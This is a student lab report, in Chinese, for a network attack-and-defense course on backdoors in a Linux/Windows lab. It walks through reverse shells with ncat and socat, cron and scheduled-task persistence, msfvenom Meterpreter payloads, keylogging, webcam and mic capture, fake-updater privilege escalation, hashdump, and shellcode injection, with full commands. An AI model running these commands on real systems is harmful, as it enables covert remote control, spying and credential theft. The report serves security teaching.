20212309 2023-2024-2 《网络与系统攻防技术》实验2实验报告

20212309沈烨 2024-04-03 23:35:23

1.实验内容

1.1 本周学习内容

1)后门概念:后门就是不经过正常认证流程而访问系统的通道。
(2)后门类型:
编译器后门
操作系统后门
应用程序后门
潜伏于操作系统中或伪装为特定应用的专用后门程序
(3)自启动技术:
Windows平台:
  基于Windows启动目录的自启动
  基于注册表的自启动
  基于服务程序的自启动
  基于ActiveX控件的自启动
  基于计划任务(Scheduled Tasks)的自启动
Linux平台:
  Cron自启动
(4)进程隐藏技术
基于dll的进程隐藏技术:远程注入dll技术
基于远程线程注入代码的进程隐藏技术
Rootkit方式
(5)数据穿透与躲避技术:
  反弹端口
  隧道技术
  加密
(6)后门攻击的过程:
木马程序 - 植入系统 - 木马运行 - 免杀技术 - 穿透和躲避

1.2 实验问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

恶意网站伪装成软件下载网站,在提供的软件安装包里隐藏木马,从而实现注入后门。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

#Windows
  伪装成或安插进安装包等其他程序,欺骗用户启动
  创建计划任务,在特定条件下自动启动
  添加入开机启动项,开机自动启动

#Linux
  通过Cron自动运行

(3)Meterpreter有哪些给你映像深刻的功能?

远程获取shell;远程获得截屏、录音、摄像、记录键盘输入权限

(4)如何发现自己有系统有没有被安装后门?

安装360、火绒等杀毒软件,进行查杀
检查系统日志,自行寻找异常活动

2.实验过程

2.1前期准备

Windows机ip:192.168.3.14(但是实验过程中发现192.168.11.1这个ip有时也能用,原因未知)

img

Linux机ip:192.168.11.129

img

安装工具:ncat

img

关闭防火墙:

img

img

2.2 Linux获取Windows的shell

Windows:

ncat.exe -e cmd.exe 192.168.11.129 2309

img

Linux:

nc -l -p 2309

img

2.3 Windows获取Linux的shell,cron启动

Linux:

crontab -e以进入文件编辑界面
在文件末尾添加代码* * * * * /bin/netcat 192.168.3.14 2309 -e /bin/sh,表示每分钟定时执行反向连接Windows机的2309端口
可以通过crontab -l查看是否编辑成功

img

Windows:

ncat.exe -l -p 2309

img

2.4 Linux获取Windows的shell,定时启动

在Windows系统打开任务计划程序,创建任务

img

设定时间为2024-4-2的16:47时

img

设定程序为socat.exe,脚本为tcp-listen:2309 exec:cmd.exe,pty,stderr

img

到指定时间时,自动弹出命令提示符界面

img

在Linux机内输入如下代码,即可获得Windows的shell

socat - tcp:192.168.11.1:2309

img

2.5 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

Linux:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.129 LPORT=2309 -f exe > 20212309_backdoor.exe

Windows:

ncat.exe - lv 2309 > 20212309_backdoor.exe

img

Linux:

ncat 192.168.3.14 2309 < 20212309_backdoor.exe

img

在Windows机的D:\ncat文件夹内即可找到20212309_backdoor.exe文件。注意需要关闭系统杀毒程序,不然文件会被隔离。
运行该程序来启动会话。

img

Linux:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.11.129
set LPORT 2309
show options
exploit

最后即可获取Windows机的shell

img

img

2.6.1 使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容

Linux:仍然在msfconsole内:

record_mic // 录音
screenshot // 截屏
webcam_snap // 拍照
keyscan_start // 开始记录键盘输入
keyscan_dump // 结束记录键盘输入

img

入侵结果:

img

2.6.2 尝试提权,并破解计算机密码

Linux:仍然在msfconsole内:

bg
use exploit/windows/local/ask
set SESSION 1
set FILENAME WeiChatUpdater.exe
run

运行完run后,Windows机会弹出“你要允许来自未知发布者的此应用对你的设备进行更改吗?”提示。允许后即可完成提权。

Linux:

run post/windows/gather/hashdump

即可破解密码(但是只有hash)

img

2.7 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.11.129 LPORT=2309 -x 20212309-0 -f elf > 20212309_pwn
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.11.129
set LPORT 2309
exploit

img

img

在Linux的另一个终端中:

chmod +x 20212309_pwn
./20212309_pwn

img

最后即可获得shell

3.问题及解决方案

问题1:在Windows机的命令提示符中运行程序时报错“'ipconfig'不是内部或外部命令,也不是可运行的程序”
问题1解决方案:该错误原因是环境变量错误。使用如下命令初始化环境变量后重启即可

setx PATH "%PATH%;C:\Windows\System32"

问题2:传输给Windows机pwn文件后,离奇消失。
问题2解决方案:pwn文件被windows安全中心发现并隔离。解除隔离并信任即可

img

4.学习感悟、思考等

本次实验中,我成功通过后门攻击获取了目标系统的shell。通过此后门,我们可以轻松获取目标机的敏感信息,并实现了对系统的远程操控。此外,我熟练掌握了netcat、socat和MSF等工具和平台的使用,加深了对Linux和Windows命令的掌握,也对后门攻击的危害有了更深刻的认识。实验证明,后门攻击具有极高的隐蔽性和危害性。因此,我们应高度重视系统安全,及时更新漏洞补丁,提高防御能力。本次实验为我们提供了宝贵的网络安全实践经验,加强了我对后门攻击原理和防范方法的理解。

参考资料

《Java程序设计与数据结构教程(第二版)》
《Java程序设计与数据结构教程(第二版)》学习指导

...全文
60 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

92

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧